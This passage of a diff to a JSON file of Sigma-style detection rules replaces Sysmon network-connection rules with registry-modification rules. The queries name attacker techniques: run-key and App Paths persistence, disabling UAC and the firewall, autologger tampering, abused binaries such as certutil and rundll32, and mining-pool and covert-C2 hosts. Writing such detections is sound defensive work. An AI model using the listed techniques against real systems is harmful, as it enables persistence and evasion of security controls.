'%content.dropboxapi.com' ESCAPE '\\')) AND NOT (Image LIKE '%\\\\Dropbox%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\App Paths%' ESCAPE '\\' AND (TargetObject LIKE '%(Default)' ESCAPE '\\' OR TargetObject LIKE '%Path' ESCAPE '\\') AND (Details LIKE '%\\\\Users\\\\Public%' ESCAPE '\\' OR Details LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR Details LIKE '%\\%temp\\%%' ESCAPE '\\' OR Details LIKE '%\\%tmp\\%%' ESCAPE '\\' OR Details LIKE '%iex%' ESCAPE '\\' OR Details LIKE '%Invoke-%' ESCAPE '\\' OR Details LIKE '%rundll32%' ESCAPE '\\' OR Details LIKE '%regsvr32%' ESCAPE '\\' OR Details LIKE '%mshta%' ESCAPE '\\' OR Details LIKE '%cscript%' ESCAPE '\\' OR Details LIKE '%wscript%' ESCAPE '\\' OR Details LIKE '%.bat%' ESCAPE '\\' OR Details LIKE '%.hta%' ESCAPE '\\' OR Details LIKE '%.dll%' ESCAPE '\\' OR Details LIKE '%.ps1%' ESCAPE '\\'))" ], - "filename": "net_connection_win_susp_dropbox_api.yml" + "filename": "registry_set_persistence_app_paths.yml" }, { - "title": "RDP to HTTP or HTTPS Target Ports", - "id": "b1e5da3b-ca8e-4adf-915c-9921f3d85481", + "title": "Potential AutoLogger Sessions Tampering", + "id": "f37b4bce-49d0-4087-9f5b-58bffda77316", "status": "experimental", - "description": "Detects svchost hosting RDP termsvcs communicating to target systems on TCP port 80 or 443", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects tampering with autologger trace sessions which is a technique used by attackers to disable logging", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1572", - "attack.lateral_movement", - "attack.t1021.001", - "car.2013-07-002" + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Initiated = 'true' AND SourcePort = '3389' AND DestinationPort IN ('80', '443'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\System\\\\CurrentControlSet\\\\Control\\\\WMI\\\\Autologger\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\EventLog-%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Defender%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\Enable' ESCAPE '\\' OR TargetObject LIKE '%\\\\Start' ESCAPE '\\') AND Details = 'DWORD (0x00000000)') AND NOT ((Image LIKE 'C:\\\\Windows\\\\system32\\\\wevtutil.exe' ESCAPE '\\')))" ], - "filename": "net_connection_win_rdp_to_http.yml" + "filename": "registry_set_disable_autologger_sessions.yml" }, { - "title": "Microsoft Binary Github Communication", - "id": "635dbb88-67b3-4b41-9ea5-a3af2dd88153", + "title": "Registry Persistence via Explorer Run Key", + "id": "b7916c2a-fa2f-4795-9477-32b731f70f11", "status": "test", - "description": "Detects an executable in the Windows folder accessing github.com", - "author": "Michael Haag (idea), Florian Roth (Nextron Systems)", + "description": "Detects a possible persistence mechanism using RUN key for Windows Explorer and pointing to a suspicious folder", + "author": "Florian Roth (Nextron Systems), oscd.community", "tags": [ - "attack.lateral_movement", - "attack.t1105", - "attack.exfiltration", - "attack.t1567.001" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Unknown", - "@subTee in your network" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Initiated = 'true' AND (DestinationHostname LIKE '%.github.com' ESCAPE '\\' OR DestinationHostname LIKE '%.githubusercontent.com' ESCAPE '\\') AND Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\Run' ESCAPE '\\') AND ((Details LIKE 'C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE 'C:\\\\ProgramData\\\\%' ESCAPE '\\' OR Details LIKE 'C:\\\\$Recycle.bin\\\\%' ESCAPE '\\' OR Details LIKE 'C:\\\\Temp\\\\%' ESCAPE '\\' OR Details LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Details LIKE 'C:\\\\Users\\\\Default\\\\%' ESCAPE '\\') OR Details LIKE '%\\\\AppData\\\\%' ESCAPE '\\'))" ], - "filename": "net_connection_win_binary_github_com.yml" + "filename": "registry_set_susp_reg_persist_explorer_run.yml" }, { - "title": "Microsoft Sync Center Suspicious Network Connections", - "id": "9f2cc74d-78af-4eb2-bb64-9cd1d292b87b", + "title": "Disable UAC Using Registry", + "id": "48437c39-9e5f-47fb-af95-3d663c3f2919", "status": "experimental", - "description": "Detects suspicious connections from Microsoft Sync Center to non-private IPs.", - "author": "elhoim", + "description": "Detects when an attacker tries to disable User Account Control (UAC) by changing its registry key HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLUA from 1 to 0", + "author": "frack113", "tags": [ - "attack.t1055", - "attack.t1218", - "attack.execution", - "attack.defense_evasion" + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND Image LIKE '%\\\\mobsync.exe' ESCAPE '\\' AND NOT ((DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '192.168.%' ESCAPE '\\' OR DestinationIp LIKE '172.16.%' ESCAPE '\\' OR DestinationIp LIKE '172.17.%' ESCAPE '\\' OR DestinationIp LIKE '172.18.%' ESCAPE '\\' OR DestinationIp LIKE '172.19.%' ESCAPE '\\' OR DestinationIp LIKE '172.20.%' ESCAPE '\\' OR DestinationIp LIKE '172.21.%' ESCAPE '\\' OR DestinationIp LIKE '172.22.%' ESCAPE '\\' OR DestinationIp LIKE '172.23.%' ESCAPE '\\' OR DestinationIp LIKE '172.24.%' ESCAPE '\\' OR DestinationIp LIKE '172.25.%' ESCAPE '\\' OR DestinationIp LIKE '172.26.%' ESCAPE '\\' OR DestinationIp LIKE '172.27.%' ESCAPE '\\' OR DestinationIp LIKE '172.28.%' ESCAPE '\\' OR DestinationIp LIKE '172.29.%' ESCAPE '\\' OR DestinationIp LIKE '172.30.%' ESCAPE '\\' OR DestinationIp LIKE '172.31.%' ESCAPE '\\') AND DestinationIsIpv6 = 'false'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\EnableLUA%' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" ], - "filename": "net_connection_win_susp_outbound_mobsync_connection.yml" + "filename": "registry_set_disable_uac_registry.yml" }, { - "title": "Python Initiated Connection", - "id": "bef0bc5a-b9ae-425d-85c6-7b2d705980c6", + "title": "Office Security Settings Changed", + "id": "a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd", "status": "experimental", - "description": "Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation", - "author": "frack113", + "description": "Detects registry changes to Office macro settings. The TrustRecords contain information on executed macro-enabled documents. (see references)", + "author": "Trent Liffick (@tliffick)", "tags": [ - "attack.discovery", - "attack.t1046" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Legitimate python script" + "Valid Macros and/or internal documents" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Initiated = 'true' AND Image LIKE '%python%' ESCAPE '\\') AND NOT ((ParentImage LIKE 'C:\\\\ProgramData\\\\Anaconda3\\\\Scripts\\\\conda.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData\\\\Anaconda3\\\\Scripts\\\\conda-script.py%' ESCAPE '\\' AND CommandLine LIKE '%update%' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\ProgramData\\\\Anaconda3\\\\python.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\ProgramData\\\\Anaconda3\\\\Scripts\\\\jupyter-notebook-script.py%' ESCAPE '\\') OR (DestinationIp = '127.0.0.1' AND SourceIp = '127.0.0.1')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\Security\\\\Trusted Documents\\\\TrustRecords' ESCAPE '\\' OR TargetObject LIKE '%\\\\Security\\\\AccessVBOM' ESCAPE '\\' OR TargetObject LIKE '%\\\\Security\\\\VBAWarnings' ESCAPE '\\'))" ], - "filename": "net_connection_win_python.yml" + "filename": "registry_set_office_security.yml" }, { - "title": "Silenttrinity Stager Msbuild Activity", - "id": "50e54b8d-ad73-43f8-96a1-5191685b17a4", + "title": "Disable Microsoft Defender Firewall via Registry", + "id": "974515da-6cc5-4c95-ae65-f97f9150ec7f", "status": "test", - "description": "Detects a possible remote connections to Silenttrinity c2", - "author": "Kiran kumar s, oscd.community", + "description": "Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1127.001" + "attack.defense_evasion", + "attack.t1562.004" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\msbuild.exe' ESCAPE '\\' AND DestinationPort IN ('80', '443') AND Initiated = 'true')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\SharedAccess\\\\Parameters\\\\FirewallPolicy\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\EnableFirewall' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" ], - "filename": "net_connection_win_silenttrinity_stager_msbuild_activity.yml" + "filename": "registry_set_disable_defender_firewall.yml" }, { - "title": "Windows Crypto Mining Pool Connections", - "id": "fa5b1358-b040-4403-9868-15f7d9ab6329", - "status": "stable", - "description": "Detects process connections to a Monero crypto mining pool", - "author": "Florian Roth (Nextron Systems)", + "title": "Registry Explorer Policy Modification", + "id": "1c3121ed-041b-4d97-a075-07f54f20fb4a", + "status": "test", + "description": "Detects registry modifications that disable internal tools or functions in explorer (malware like Agent Tesla uses this technique)", + "author": "frack113", "tags": [ - "attack.impact", - "attack.t1496" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "Legitimate use of crypto miners" + "Legitimate admin script" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND DestinationHostname IN ('pool.minexmr.com', 'fr.minexmr.com', 'de.minexmr.com', 'sg.minexmr.com', 'ca.minexmr.com', 'us-west.minexmr.com', 'pool.supportxmr.com', 'mine.c3pool.com', 'xmr-eu1.nanopool.org', 'xmr-eu2.nanopool.org', 'xmr-us-east1.nanopool.org', 'xmr-us-west1.nanopool.org', 'xmr-asia1.nanopool.org', 'xmr-jp1.nanopool.org', 'xmr-au1.nanopool.org', 'xmr.2miners.com', 'xmr.hashcity.org', 'xmr.f2pool.com', 'xmrpool.eu', 'pool.hashvault.pro', 'moneroocean.stream', 'monerocean.stream'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoLogOff' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoDesktop' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoRun' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoFind' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoControlPanel' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoFileMenu' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoClose' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoSetTaskbar' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoPropertiesMyDocuments' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\Explorer\\\\NoTrayContextMenu' ESCAPE '\\') AND Details = 'DWORD (0x00000001)')" ], - "filename": "net_connection_win_crypto_mining.yml" + "filename": "registry_set_set_nopolicies_user.yml" }, { - "title": "Rundll32 Internet Connection", - "id": "cdc8da7d-c303-42f8-b08c-b4ab47230263", - "status": "test", - "description": "Detects a rundll32 that communicates with public IP addresses", - "author": "Florian Roth (Nextron Systems)", + "title": "Set TimeProviders DllName", + "id": "e88a6ddc-74f7-463b-9b26-f69fc0d2ce85", + "status": "experimental", + "description": "Detects processes setting a new DLL in DllName in under HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\W32Time\\TimeProvider.\nAdversaries may abuse time providers to execute DLLs when the system boots.\nThe Windows Time service (W32Time) enables time synchronization across and within domains.\n", + "author": "frack113", "tags": [ - "attack.defense_evasion", - "attack.t1218.011", - "attack.execution" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1547.003" ], "falsepositives": [ - "Communication to other corporate systems that use IP addresses from public address spaces" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\rundll32.exe' ESCAPE '\\' AND Initiated = 'true') AND NOT (((DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '192.168.%' ESCAPE '\\' OR DestinationIp LIKE '172.16.%' ESCAPE '\\' OR DestinationIp LIKE '172.17.%' ESCAPE '\\' OR DestinationIp LIKE '172.18.%' ESCAPE '\\' OR DestinationIp LIKE '172.19.%' ESCAPE '\\' OR DestinationIp LIKE '172.20.%' ESCAPE '\\' OR DestinationIp LIKE '172.21.%' ESCAPE '\\' OR DestinationIp LIKE '172.22.%' ESCAPE '\\' OR DestinationIp LIKE '172.23.%' ESCAPE '\\' OR DestinationIp LIKE '172.24.%' ESCAPE '\\' OR DestinationIp LIKE '172.25.%' ESCAPE '\\' OR DestinationIp LIKE '172.26.%' ESCAPE '\\' OR DestinationIp LIKE '172.27.%' ESCAPE '\\' OR DestinationIp LIKE '172.28.%' ESCAPE '\\' OR DestinationIp LIKE '172.29.%' ESCAPE '\\' OR DestinationIp LIKE '172.30.%' ESCAPE '\\' OR DestinationIp LIKE '172.31.%' ESCAPE '\\' OR DestinationIp LIKE '127.%' ESCAPE '\\' OR DestinationIp LIKE '20.%' ESCAPE '\\' OR DestinationIp LIKE '51.103.%' ESCAPE '\\' OR DestinationIp LIKE '51.104.%' ESCAPE '\\' OR DestinationIp LIKE '51.105.%' ESCAPE '\\') OR CommandLine LIKE '%PcaSvc.dll,PcaPatchSdbTask%' ESCAPE '\\' OR SourceHostname LIKE '%.internal.cloudapp.net' ESCAPE '\\') OR (ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND DestinationPort = '443')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\W32Time\\\\TimeProviders%' ESCAPE '\\' AND TargetObject LIKE '%DllName' ESCAPE '\\') AND NOT (Details LIKE 'C:\\\\Windows\\\\SYSTEM32\\\\w32time.DLL' ESCAPE '\\'))" ], - "filename": "net_connection_win_rundll32_net_connections.yml" + "filename": "registry_set_timeproviders_dllname.yml" }, { - "title": "Suspicious Epmap Connection", - "id": "628d7a0b-7b84-4466-8552-e6138bc03b43", + "title": "Office Autorun Keys Modification", + "id": "baecf8fb-edbf-429f-9ade-31fc3f22b970", "status": "experimental", - "description": "Detects suspicious \"epmap\" connection to a remote computer via remote procedure call (RPC)", - "author": "frack113, Tim Shelton (fps)", + "description": "Detects modification of autostart extensibility point (ASEP) in registry.", + "author": "Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split)", "tags": [ - "attack.lateral_movement" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Unknown" + "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reason", + "Legitimate administrator sets up autorun keys for legitimate reason" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Protocol = 'tcp' AND Initiated = 'true' AND DestinationPort = '135') AND NOT ((Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\ProgramData\\\\Amazon\\\\SSM\\\\Update\\\\amazon-ssm-agent-updater%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Wow6432Node\\\\Microsoft\\\\Office%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\Word\\\\Addins%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PowerPoint\\\\Addins%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Onenote\\\\Addins%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Excel\\\\Addins%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Access\\\\Addins%' ESCAPE '\\' OR TargetObject LIKE '%test\\\\Special\\\\Perf%' ESCAPE '\\')) AND NOT ((Details = '(Empty)') OR ((Image LIKE 'C:\\\\Program Files\\\\Microsoft Office\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft Office\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe%' ESCAPE '\\' OR Image LIKE 'C:\\\\Windows\\\\System32\\\\regsvr32.exe%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\Excel\\\\Addins\\\\AdHocReportingExcelClientLib.AdHocReportingExcelClientAddIn.1\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Excel\\\\Addins\\\\ExcelPlugInShell.PowerMapConnect\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Excel\\\\Addins\\\\NativeShim\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Excel\\\\Addins\\\\NativeShim.InquireConnector.1\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Excel\\\\Addins\\\\PowerPivotExcelClientAddIn.NativeEntry.1\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\AddIns\\\\AccessAddin.DC\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\AddIns\\\\ColleagueImport.ColleagueImportAddin\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\AddIns\\\\EvernoteCC.EvernoteContactConnector\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\AddIns\\\\EvernoteOLRD.Connect\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\Microsoft.VbaAddinForOutlook.1\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\OcOffice.OcForms\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\OneNote.OutlookAddin%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\OscAddin.Connect\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\OutlookChangeNotifier.Connect\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\UCAddin.LyncAddin.1%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\UCAddin.UCAddin.1%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Outlook\\\\Addins\\\\UmOutlookAddin.FormRegionAddin\\\\%' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Common Files\\\\Microsoft Shared\\\\ClickToRun\\\\Updates\\\\%' ESCAPE '\\') AND Image LIKE '%\\\\OfficeClickToRun.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\AVG\\\\Antivirus\\\\RegSvr.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Office\\\\Outlook\\\\Addins\\\\Antivirus.AsOutExt\\\\%' ESCAPE '\\')))" ], - "filename": "net_connection_win_susp_epmap.yml" + "filename": "registry_set_asep_reg_keys_modification_office.yml" }, { - "title": "Dead Drop Resolvers", - "id": "297ae038-edc2-4b2e-bb3e-7c5fc94dd5c7", - "status": "test", - "description": "Detects an executable, which is not an internet browser, making DNS request to legit popular websites, which were seen to be used as dead drop resolvers in previous attacks.", - "author": "Sorina Ionescu", + "title": "NET NGenAssemblyUsageLog Registry Key Tamper", + "id": "28036918-04d3-423d-91c0-55ecf99fb892", + "status": "experimental", + "description": "Detects changes to the NGenAssemblyUsageLog registry key.\n.NET Usage Log output location can be controlled by setting the NGenAssemblyUsageLog CLR configuration knob in the Registry or by configuring an environment variable (as described in the next section).\nBy simplify specifying an arbitrary value (e.g. fake output location or junk data) for the expected value, a Usage Log file for the .NET execution context will not be created.\n", + "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1102", - "attack.t1102.001" + "attack.defense_evasion", + "attack.t1112" ], "falsepositives": [ - "One might need to exclude other internet browsers found in it's network or other applications like ones mentioned above from Microsoft Defender." + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Initiated = 'true' AND (DestinationHostname LIKE '%cdn.discordapp.com' ESCAPE '\\' OR DestinationHostname LIKE '%pastebin.com' ESCAPE '\\' OR DestinationHostname LIKE '%youtube.com' ESCAPE '\\' OR DestinationHostname LIKE '%technet.microsoft.com' ESCAPE '\\' OR DestinationHostname LIKE '%facebook.com' ESCAPE '\\' OR DestinationHostname LIKE '%.cloudflare.com' ESCAPE '\\' OR DestinationHostname LIKE '%docs.google.com' ESCAPE '\\' OR DestinationHostname LIKE '%steamcommunity.com' ESCAPE '\\' OR DestinationHostname LIKE '%reddit.com' ESCAPE '\\' OR DestinationHostname LIKE '%fotolog.com' ESCAPE '\\' OR DestinationHostname LIKE '%twitter.com' ESCAPE '\\' OR DestinationHostname LIKE '%imgur.com' ESCAPE '\\' OR DestinationHostname LIKE '%feeds.rapidfeeds.com' ESCAPE '\\' OR DestinationHostname LIKE '%livejournal.com' ESCAPE '\\' OR DestinationHostname LIKE '%.githubusercontent.com' ESCAPE '\\' OR DestinationHostname LIKE '%pastetext.net' ESCAPE '\\' OR DestinationHostname LIKE '%pastebin.pl' ESCAPE '\\' OR DestinationHostname LIKE '%paste.ee' ESCAPE '\\')) AND NOT (((Image LIKE '%\\\\iexplore.exe' ESCAPE '\\' OR Image LIKE '%\\\\msedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\edge.exe' ESCAPE '\\' OR Image LIKE '%\\\\opera.exe' ESCAPE '\\' OR Image LIKE '%\\\\brave.exe' ESCAPE '\\' OR Image LIKE '%\\\\vivaldi.exe' ESCAPE '\\' OR Image LIKE '%\\\\whale.exe' ESCAPE '\\' OR Image LIKE '%\\\\chrome.exe' ESCAPE '\\' OR Image LIKE '%\\\\firefox.exe' ESCAPE '\\')) OR ((Image LIKE '%\\\\MsMpEng.exe' ESCAPE '\\' OR Image LIKE '%\\\\MsSense.exe' ESCAPE '\\' OR Image LIKE '%\\\\PRTG Probe.exe' ESCAPE '\\' OR Image LIKE '%\\\\Engine.exe' ESCAPE '\\' OR Image LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\.NETFramework\\\\NGenAssemblyUsageLog' ESCAPE '\\')" ], - "filename": "net_connection_win_dead_drop_resolvers.yml" + "filename": "registry_set_net_cli_ngenassemblyusagelog.yml" }, { - "title": "Certutil Initiated Connection", - "id": "0dba975d-a193-4ed1-a067-424df57570d1", - "status": "experimental", - "description": "Detects a network connection intitiated by the certutil.exe tool. Attackers can abuse `certutil.exe` to download malware or offensive security tools.", - "author": "frack113, Florian Roth", + "title": "Enabling COR Profiler Environment Variables", + "id": "ad89044a-8f49-4673-9a55-cbd88a1b374f", + "status": "test", + "description": "This rule detects cor_enable_profiling and cor_profiler environment variables being set and configured.", + "author": "Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research)", "tags": [ - "attack.command_and_control", - "attack.t1105" - ], - "falsepositives": [ - "Legitimate certutil network connection" + "attack.persistence", + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1574.012" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\certutil.exe' ESCAPE '\\' AND Initiated = 'true' AND DestinationPort IN ('80', '443', '135', '445'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\COR\\_ENABLE\\_PROFILING' ESCAPE '\\' OR TargetObject LIKE '%\\\\COR\\_PROFILER' ESCAPE '\\'))" ], - "filename": "net_connection_win_certutil.yml" + "filename": "registry_set_enabling_cor_profiler_env_variables.yml" }, { - "title": "Suspicious Non-Browser Network Communication With Reddit API", - "id": "d7b09985-95a3-44be-8450-b6eadf49833e", + "title": "Potential Attachment Manager Settings Attachments Tamper", + "id": "ee77a5db-b0f3-4be2-bfd4-b58be1c6b15a", "status": "experimental", - "description": "Detects an a non-browser process interacting with the Reddit API which could indicate use of a covert C2 such as RedditC2", - "author": "Gavin Knapp", + "description": "Detects tampering with attachment manager settings policies attachments (See reference for more information)", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1102" + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate applications communicating with the Reddit API e.g. web browsers not in exclusion list, app with an RSS etc." + "Unlikely" ], - "level": "low", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND DestinationHostname LIKE '%reddit.com/api%' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\brave.exe' ESCAPE '\\' OR Image LIKE '%\\\\chrome.exe' ESCAPE '\\' OR Image LIKE '%\\\\ExpressConnectNetworkService.exe' ESCAPE '\\' OR Image LIKE '%\\\\firefox.exe' ESCAPE '\\' OR Image LIKE '%\\\\iexplorer.exe' ESCAPE '\\' OR Image LIKE '%\\\\maxthon.exe' ESCAPE '\\' OR Image LIKE '%\\\\msedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\opera.exe' ESCAPE '\\' OR Image LIKE '%\\\\safari.exe' ESCAPE '\\' OR Image LIKE '%\\\\seamonkey.exe' ESCAPE '\\' OR Image LIKE '%\\\\vivaldi.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 